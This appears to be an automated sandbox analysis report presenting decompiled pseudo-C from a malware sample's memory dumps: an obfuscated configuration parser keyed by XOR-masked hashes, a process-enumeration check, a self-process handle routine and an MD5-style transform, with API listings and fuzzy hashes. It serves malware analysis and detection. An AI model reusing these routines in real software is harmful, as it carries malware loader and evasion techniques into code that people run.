Instruction Fuzzy Hash: CBB012B06063149FD7108F50EFC9B103764E348302F000010F652D526DC73004009B14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 022B7FBE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E022B7FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x22bd2a4; // 0x69b25f44
				if(E022B6247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x22bd2d8 = _v8;
				}
				_t33 =  *0x22bd2a4; // 0x69b25f44
				if(E022B6247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x22bd2a4; // 0x69b25f44
				if(E022B6247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x22bd238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x22bd2a4; // 0x69b25f44
						_t45 = E022B9403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x22bd240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x22bd2a4; // 0x69b25f44
						_t46 = E022B9403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x22bd244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x22bd2a4; // 0x69b25f44
						_t47 = E022B9403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x22bd248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x22bd2a4; // 0x69b25f44
						_t48 = E022B9403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x22bd004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x22bd2a4; // 0x69b25f44
						_t49 = E022B9403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x22bd02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x22bd2a4; // 0x69b25f44
						_t50 = E022B9403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x22bd24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x22bd2a4; // 0x69b25f44
								_t51 = E022B9403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E022BA0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E022B9FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x22bd2a4; // 0x69b25f44
								_t52 = E022B9403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E022BA0FD(0, _t52) != 0) {
								_t121 =  *0x22bd32c; // 0x47795b0
								E022B1128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x22bd2a4; // 0x69b25f44
								_t53 = E022B9403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x22bd2a8; // 0x24ba5a8
								_t22 = _t54 + 0x22be252; // 0x616d692f
								 *0x22bd2d4 = _t22;
								goto L60;
							} else {
								_t64 = E022BA0FD(0, _t53);
								 *0x22bd2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x22bd2a4; // 0x69b25f44
										_t56 = E022B9403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x22bd2a8; // 0x24ba5a8
										_t23 = _t57 + 0x22be791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E022BA0FD(0, _t56);
									}
									 *0x22bd340 = _t58;
									HeapFree( *0x22bd238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x022b7fbe
0x022b7fc1
0x022b7fe1
0x022b7fef
0x022b7fef
0x022b7ff4
0x022b800e
0x022b8276
0x022b827d
0x022b8284
0x022b8284
0x022b8014
0x022b8030
0x022b8264
0x022b826e
0x00000000
0x022b8036
0x022b8036
0x022b803b
0x022b8051
0x022b803d
0x022b803d
0x022b804a
0x022b804a
0x022b805b
0x022b805d
0x022b8067
0x022b806c
0x022b806c
0x022b8067
0x022b8073
0x022b8089
0x022b8075
0x022b8075
0x022b8082
0x022b8082
0x022b808d
0x022b808f
0x022b8099
0x022b809e
0x022b809e
0x022b8099
0x022b80a5
0x022b80bb
0x022b80a7
0x022b80a7
0x022b80b4
0x022b80b4
0x022b80bf
0x022b80c1
0x022b80cb
0x022b80d0
0x022b80d0
0x022b80cb
0x022b80d7
0x022b80ed
0x022b80d9
0x022b80d9
0x022b80e6
0x022b80e6
0x022b80f1
0x022b80f3
0x022b80fd
0x022b8102
0x022b8102
0x022b80fd
0x022b8109
0x022b811f
0x022b810b
0x022b810b
0x022b8118
0x022b8118
0x022b8123
0x022b8125
0x022b812f
0x022b8134
0x022b8134
0x022b812f
0x022b813b
0x022b8151
0x022b813d
0x022b813d
0x022b814a
0x022b814a
0x022b8155
0x022b8168
0x022b8168
0x00000000
0x022b8157
0x022b8157
0x022b8161
0x00000000
0x022b8172
0x022b8172
0x022b8174
0x022b818a
0x022b8176
0x022b8176
0x022b8183
0x022b8183
0x022b818e
0x022b8190
0x022b8193
0x022b8194
0x022b819b
0x022b819d
0x022b819e
0x022b819e
0x022b819b
0x022b81a5
0x022b81bb
0x022b81a7
0x022b81a7
0x022b81b4
0x022b81b4
0x022b81bf
0x022b81cd
0x022b81d7
0x022b81d7
0x022b81de
0x022b81f4
0x022b81e0
0x022b81e0
0x022b81ed
0x022b81ed
0x022b81f8
0x022b820b
0x022b820b
0x022b8210
0x022b8216
0x00000000
0x022b81fa
0x022b81fd
0x022b8202
0x022b8209
0x022b821b
0x022b821d
0x022b8233
0x022b821f
0x022b821f
0x022b822c
0x022b822c
0x022b8237
0x022b8243
0x022b8248
0x022b8248
0x022b8239
0x022b823c
0x022b823c
0x022b8256
0x022b825b
0x022b8261
0x00000000
0x022b8261
0x00000000
0x022b8209
0x022b81f8
0x022b8161
0x022b8155

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B8063
StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B8095
StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B80C7
StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B80F9
StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B812B
StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B815D
HeapFree.KERNEL32(00000000,022B30F3,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008,?,022B30F3), ref: 022B825B
HeapFree.KERNEL32(00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008,?,022B30F3), ref: 022B826E

Part of subcall function 022BA0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,022B30F3,022B8241,00000000,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005), ref: 022BA106
Part of subcall function 022BA0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,022B30F3), ref: 022BA129
Part of subcall function 022BA0FD: memset.NTDLL ref: 022BA138

Strings

Ut, xrefs: 022B825B, 022B826E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID: Ut
API String ID: 3442150357-8415677
Opcode ID: fa83d14361f5f4f7ba291b108407451d4ef1ef4c540544f41d1e26452de262d5
Instruction ID: b4fc6166b625a698bbefb1cbd94b7c76159ae8a4646cf9fa2043a2701eb50832
Opcode Fuzzy Hash: fa83d14361f5f4f7ba291b108407451d4ef1ef4c540544f41d1e26452de262d5
Instruction Fuzzy Hash: 5C818174E30246AFCB13EBF4DD889EB76ADDF483807280D25E509D7119EBB5D9418B22

Uniqueness

Uniqueness Score: -1.00%

Function 022B8F1B, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E022B8F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x22bd2a8; // 0x24ba5a8
						_t2 = _t9 + 0x22bee34; // 0x73617661
						_push( &_v264);
						if( *0x22bd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x022b8f26
0x022b8f30
0x022b8f34
0x022b8f3e
0x022b8f6f
0x022b8f45
0x022b8f4a
0x022b8f57
0x022b8f60
0x022b8f77
0x022b8f62
0x022b8f6a
0x00000000
0x022b8f6a
0x022b8f78
0x022b8f79
0x00000000
0x022b8f79
0x00000000
0x022b8f73
0x022b8f7f
0x022b8f84

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022B8F2B
Process32First.KERNEL32(00000000,?), ref: 022B8F3E
Process32Next.KERNEL32(00000000,?), ref: 022B8F6A
CloseHandle.KERNEL32(00000000), ref: 022B8F79

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 3187485b2835e4e9e154279955b671efa32523b990fa22b717fe148f5e774e33
Instruction ID: 69053d0e70cc7cd89f62d6d7320f05d3c5fe674491e723aabc1b0e0d2004c563
Opcode Fuzzy Hash: 3187485b2835e4e9e154279955b671efa32523b990fa22b717fe148f5e774e33
Instruction Fuzzy Hash: 94F02B355211246BE723B6E69C0CEEBB26EDFC5390F400161E919C3008EF20CA45CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00401752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401752() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x4030f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4030fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x4030ec = _t3;
						_t5 = GetCurrentProcessId();
						 *0x4030e8 = _t5;
						 *0x4030f0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x4030e4 = _t6;
						if(_t6 == 0) {
							 *0x4030e4 =  *0x4030e4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401753
0x00401761
0x00401767
0x0040176e
0x004017c5
0x004017c5
0x00401770
0x00401778
0x00401785
0x00401785
0x004017c1
0x004017c3
0x00000000
0x00000000
0x00000000
0x0040177a
0x00401781
0x00401787
0x00401787
0x0040178c
0x0040179a
0x0040179f
0x004017a5
0x004017ab
0x004017b2
0x004017b4
0x004017b4
0x004017be
0x00401783
0x00401783
0x00000000
0x00401783
0x00401781

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
GetVersion.KERNEL32 ref: 00401770
GetCurrentProcessId.KERNEL32 ref: 0040178C
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction ID: de110183062e86dcac6d67db381f44f5737484f963d514ed7bd2dcac5e25d41b
Opcode Fuzzy Hash: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction Fuzzy Hash: BDF01D306813129BE6119F647F19B953B69A705712F108136FA02F62E4E7B58541CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 022B836E, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E022B836E(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x022b8371
0x022b837c
0x022b837f
0x022b8382
0x022b8383
0x022b83a1
0x022b83a3
0x022b83a6
0x022b83a9
0x022b83a9
0x022b83ac
0x022b83ac
0x022b83af
0x022b83af
0x022b83b2
0x022b83b2
0x022b83cf
0x022b83d2
0x022b83e8
0x022b83eb
0x022b8405
0x022b8408
0x022b841e
0x022b8421
0x022b8423
0x022b843b
0x022b843e
0x022b8441
0x022b8459
0x022b845c
0x022b8476
0x022b8479
0x022b848f
0x022b8492
0x022b8494
0x022b84ac
0x022b84b1
0x022b84b4
0x022b84ca
0x022b84cd
0x022b84e7
0x022b84ea
0x022b8500
0x022b8503
0x022b8505
0x022b8520
0x022b8523
0x022b853a
0x022b853d
0x022b8541
0x022b855a
0x022b855d
0x022b855f
0x022b8562
0x022b857d
0x022b8580
0x022b8599
0x022b859c
0x022b85ac
0x022b85af
0x022b85c7
0x022b85ca
0x022b85e4
0x022b85e7
0x022b85ff
0x022b8602
0x022b8618
0x022b861b
0x022b8633
0x022b8636
0x022b864e
0x022b8651
0x022b866b
0x022b866e
0x022b8684
0x022b8687
0x022b869f
0x022b86a2
0x022b86bc
0x022b86bf
0x022b86d7
0x022b86da
0x022b86f0
0x022b86f3
0x022b870b
0x022b870e
0x022b8726
0x022b8729
0x022b873b
0x022b873e
0x022b8750
0x022b8753
0x022b8765
0x022b8768
0x022b876c
0x022b877c
0x022b877f
0x022b878d
0x022b8790
0x022b87a2
0x022b87a5
0x022b87b9
0x022b87bc
0x022b87be
0x022b87ce
0x022b87d1
0x022b87e3
0x022b87e6
0x022b87f4
0x022b87f7
0x022b8809
0x022b880c
0x022b8810
0x022b8820
0x022b8823
0x022b8835
0x022b8838
0x022b8846
0x022b8849
0x022b885b
0x022b885e
0x022b8870
0x022b8873
0x022b8887
0x022b888a
0x022b889e
0x022b88a1
0x022b88b5
0x022b88b8
0x022b88cc
0x022b88cf
0x022b88e3
0x022b88e6
0x022b88fa
0x022b88ff
0x022b8911
0x022b8914
0x022b8928
0x022b892b
0x022b893f
0x022b8942
0x022b8958
0x022b895b
0x022b896f
0x022b8972
0x022b8984
0x022b8987
0x022b899b
0x022b899e
0x022b89b2
0x022b89b5
0x022b89c9
0x022b89d2
